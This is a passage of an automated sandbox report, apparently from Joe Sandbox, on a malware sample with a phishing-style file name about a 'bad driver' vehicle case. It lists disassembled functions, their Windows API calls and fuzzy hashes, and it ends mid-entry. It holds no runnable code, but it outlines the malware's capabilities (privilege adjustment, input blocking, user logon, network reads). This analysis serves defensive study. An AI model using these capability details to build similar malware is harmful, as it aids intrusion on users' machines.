Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 912374797e4a8a4e2002d26ea59c7521e4f43e77d60402d16aeaee2e5005f67f
Instruction ID: d4dafc6c9143fbf1e111f48d7759e4171d0b639c06c547c1af6f3a9621415bd7
Opcode Fuzzy Hash: 912374797e4a8a4e2002d26ea59c7521e4f43e77d60402d16aeaee2e5005f67f
Instruction Fuzzy Hash: 58516C71504310AFD320EF24DC85AAFBBE8AF94710F50496DF595972A1EBB0EA05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C140B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C140D1
_memset.LIBCMT ref: 00C140F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C14144
CloseHandle.KERNEL32(00000000), ref: 00C1414D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 4b4ee498de3aebb9405ad6ee28e01668152a6144c7dfa30f53bfd2c943d80966
Instruction ID: 5f7d75bbc4e04089045263d4e2842011470dc9dc4dcaf24b87dc14552e065be3
Opcode Fuzzy Hash: 4b4ee498de3aebb9405ad6ee28e01668152a6144c7dfa30f53bfd2c943d80966
Instruction Fuzzy Hash: 5611C875D012287AD7305BA5AC4DFEFBBBCEB45760F10459AF908D7180D6744E808BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C0EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C0EB19

Strings

(, xrefs: 00C0EB5F
|, xrefs: 00C0EB49

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 96c333c9dedfa1d44b8c952c1c35770c605571edd041b9ca0d3fad1bda29330d
Instruction ID: 4eb38ed3334e020ca4deff2a050fabb954eafebc6f26a3496c8532b5c068b3b3
Opcode Fuzzy Hash: 96c333c9dedfa1d44b8c952c1c35770c605571edd041b9ca0d3fad1bda29330d
Instruction Fuzzy Hash: 98323775A007059FDB28CF19C481A6AB7F0FF48310B15C96EE4AADB7A1E770E981CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C225E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00C226D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C2270C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 05c3e37ab8b50c6847b648c1b579d209cfc6b57d122273cde3e988546966d8c4
Instruction ID: 992ff59a729fac6db36a2de20d9d3e293f7a6c0f62e2d3bccccc9f4e96774af0
Opcode Fuzzy Hash: 05c3e37ab8b50c6847b648c1b579d209cfc6b57d122273cde3e988546966d8c4
Instruction Fuzzy Hash: 5A41E672904219BFEB20DE55EC85FBFB7FCEB40714F10406EF615A6A40EA719E419650

Uniqueness

Uniqueness Score: -1.00%

Function 00C1B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C1B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C1B655

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: a821b07cfce2e13bc079828b4bff721f01c62c2cc433d56b07cd740c1779bf3c
Instruction ID: d980a4b54254e4122bb4c8f148ced5eb383a0a5084c15ed20b7267dbb521b1aa
Opcode Fuzzy Hash: a821b07cfce2e13bc079828b4bff721f01c62c2cc433d56b07cd740c1779bf3c
Instruction Fuzzy Hash: 61215E35A10518EFCB00EFA5D880EEDBBF8FF49310F1480A9E905AB361DB319956DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C08CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FF6: std::exception::exception.LIBCMT ref: 00BD102C
Part of subcall function 00BD0FF6: __CxxThrowException@8.LIBCMT ref: 00BD1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C08D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C08D3A
GetLastError.KERNEL32 ref: 00C08D47

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 11d2a0f8c3cdc3c0635d8873a5f806acb8affed81fc3d873ea2cd49959b86475
Instruction ID: a1fc67415b6946b4efbeb5871c737966d71b9c51b3f2bb6d8cf917b531e00f8d
Opcode Fuzzy Hash: 11d2a0f8c3cdc3c0635d8873a5f806acb8affed81fc3d873ea2cd49959b86475
Instruction Fuzzy Hash: D31182B1914305AFD728AF58EC85E6BB7F8EB44710B20856EF49593251EF70AC45CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C14C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C14C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C14C43
FreeSid.ADVAPI32(?), ref: 00C14C53

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 9606850508320b26019c180bc11f20eb6ac35d39f8b383ee67bb0f8e6bcaecd0
Instruction ID: b027952695d45d3e212f645f01c83ef67fef9f20fd6fc3c9baf3264301a681f0
Opcode Fuzzy Hash: 9606850508320b26019c180bc11f20eb6ac35d39f8b383ee67bb0f8e6bcaecd0
Instruction Fuzzy Hash: 5EF03775E1120CBBDB08DFE49D89AAEBBB8EB08201F0048A9A905E2181E7706A448B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6fd4f4bd9bf88ae2e2579dc750e34677194a57fda9f6f7d3e414e5e7978929
Instruction ID: 030974b5f094544cbfbc0f0cf4b6d8353d23564e4dae9eb6d00b8f027d14af4d
Opcode Fuzzy Hash: 1d6fd4f4bd9bf88ae2e2579dc750e34677194a57fda9f6f7d3e414e5e7978929
Instruction Fuzzy Hash: 2D2249749002199FDB24DF58C491AFEB7F0FF04300F2485A9E966AB361E7B4E985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C1C966
FindClose.KERNEL32(00000000), ref: 00C1C996

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 13d1bd7595af4a43a0217b70c2cfb7aa3f1b85e9f31037cba8f498845875d6a9
Instruction ID: c44c3381a4b7ed299ab2a0d860079204e16aaad1a73fff11d9750a514a858b9e
Opcode Fuzzy Hash: 13d1bd7595af4a43a0217b70c2cfb7aa3f1b85e9f31037cba8f498845875d6a9
Instruction Fuzzy Hash: A511A1326106009FDB10EF29C845A6AF7E9FF85320F00895EF9A9D72A1DB70AC01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C2977D,?,00C3FB84,?), ref: 00C1A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C2977D,?,00C3FB84,?), ref: 00C1A314

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e12481245cafea4c06817bc216f5f5ea393795764749000b85793ef9f9800cbb
Instruction ID: 43124f9669d0772a83f749927a515d59358440bc44649919565eec8bf1def914
Opcode Fuzzy Hash: e12481245cafea4c06817bc216f5f5ea393795764749000b85793ef9f9800cbb
Instruction Fuzzy Hash: 34F0E23154522DABDB109FA4CC48FEE73ACBF09361F0041A9F818D2190DA30D940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C08713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C08851), ref: 00C08728
CloseHandle.KERNEL32(?,?,00C08851), ref: 00C0873A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: b4d970ed4e18eb33f65934ebbeb02c8d6a6164d3051df62a8e1efc5b30bc1b85
Instruction ID: f7742f3671046998b782f7a8665f5c5151ba50bc3790522307efddef168b88b2
Opcode Fuzzy Hash: b4d970ed4e18eb33f65934ebbeb02c8d6a6164d3051df62a8e1efc5b30bc1b85
Instruction Fuzzy Hash: 59E0B676014610EFE7263B68FD09E77BBE9EB04350724886EF59680470DB62AC91DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BDA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BD8F97,?,?,?,00000001), ref: 00BDA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BDA3A3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 197e680e847a7a013a871f6d9ab1de134046b84bc3ea16420c13cc729d945739
Instruction ID: 02d50ae49abbd37e063f9c0cd830d384b73b30e5f69ea5edd15c8ce39e27c317
Opcode Fuzzy Hash: 197e680e847a7a013a871f6d9ab1de134046b84bc3ea16420c13cc729d945739
Instruction Fuzzy Hash: 98B09231464208ABCA802B91EC09B8E3F68EB45AA2F404424F60D85070CB6254528E91

Uniqueness

Uniqueness Score: -1.00%

Function 00BDF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5fab8806e733e033a4273f5351147ce34132d33fa28229dc8a054cacab1f63c
Instruction ID: c719ce57ae15c30e39e82f7816099136f016fbea97b27943a5e0a13f3c28fac6
Opcode Fuzzy Hash: f5fab8806e733e033a4273f5351147ce34132d33fa28229dc8a054cacab1f63c
Instruction Fuzzy Hash: 3132F525D6DF424ED7239634D872339A289EFB73D4F15D737E81AB5AA6EB28C4834100

Uniqueness

Uniqueness Score: -1.00%

Function 00BE267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e394ab40c44bbd37f923f311d0a6f77ff1c34ed5fe97d6d5258f67c1578a39
Instruction ID: 4507f187d9795402d79fc69cfe0f0dec30e534f2aedf351d0c3a241e08ae5295
Opcode Fuzzy Hash: d2e394ab40c44bbd37f923f311d0a6f77ff1c34ed5fe97d6d5258f67c1578a39
Instruction Fuzzy Hash: DEB1E024D6AF514DD6239A39883133AB69CBFBB2D5F51E71BFC1670D22EB2185834141

Uniqueness

Uniqueness Score: -1.00%

Function 00C18B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00C18B25

Part of subcall function 00BD543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C191F8,00000000,?,?,?,?,00C193A9,00000000,?), ref: 00BD5443
Part of subcall function 00BD543A: __aulldiv.LIBCMT ref: 00BD5463

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 576c2f2915fe0263a1f6c341967ab5961e3f13c2c699c3345e216f0cca51fd0c
Instruction ID: 8fe3993ce8fcf90f33e32781bbbcd0b4cd5423db9018385f0a7488e0461d7743
Opcode Fuzzy Hash: 576c2f2915fe0263a1f6c341967ab5961e3f13c2c699c3345e216f0cca51fd0c
Instruction Fuzzy Hash: B521D2726295148BC729CF25D841B92B3E1EBA5311B288F6CD0F9CB2D0CA34B985DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00C241FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C24218

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 244f0800aea02040f87100aee0bad79e9d84bb8e80017cf3826798549a1a4e82
Instruction ID: 809113679fe8f0c7d2d914d054e99f93b4cf814be84cec7d68e3eea34bda200c
Opcode Fuzzy Hash: 244f0800aea02040f87100aee0bad79e9d84bb8e80017cf3826798549a1a4e82
Instruction Fuzzy Hash: A4E04F31250214DFC710EF5AE845A9AFBE8EF94760F00846AFD49D7752DAB0E8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C14EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00C14EEC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 67e5036f8f2a22e332d453b3065440a19fae57aedf344251ab0081f42997d11c
Instruction ID: f610fb9057d6b1047e736fd19052346587b759dae966886314a5b564dd22a43d
Opcode Fuzzy Hash: 67e5036f8f2a22e332d453b3065440a19fae57aedf344251ab0081f42997d11c
Instruction Fuzzy Hash: D5D05EA81606047AEC1C4B209C5FFF78108FB03781FD0455AB112990C1D8D06DD17030

Uniqueness

Uniqueness Score: -1.00%

Function 00C08C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C088D1), ref: 00C08CB3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: a48fd83e664230020472951d8495c8697b2e4fe83d5eabe539f5ae7097897ae3
Instruction ID: 7dc284a28298bdb4bc52a9570c05ad23792895ec98fd3a595443b27a1196f591
Opcode Fuzzy Hash: a48fd83e664230020472951d8495c8697b2e4fe83d5eabe539f5ae7097897ae3
Instruction Fuzzy Hash: BFD09E3226450EABEF019EA8DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BF2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00BF2242

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 0bef3f0a0a7b1ca32f3ed8c2bff9917e977cd452bae62540c71fc0e22e49a168
Instruction ID: e667db87c66b4c368d4f749104caa924e6ff1a19ffc58ea710b01f98c453c276
Opcode Fuzzy Hash: 0bef3f0a0a7b1ca32f3ed8c2bff9917e977cd452bae62540c71fc0e22e49a168
Instruction Fuzzy Hash: 95C04CF1C1510DDBDB05DB94D988EFEB7BCAB04304F104895A501F2101D7749B488E71

Uniqueness

Uniqueness Score: -1.00%

Function 00BDA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BDA36A

Memory Dump Source

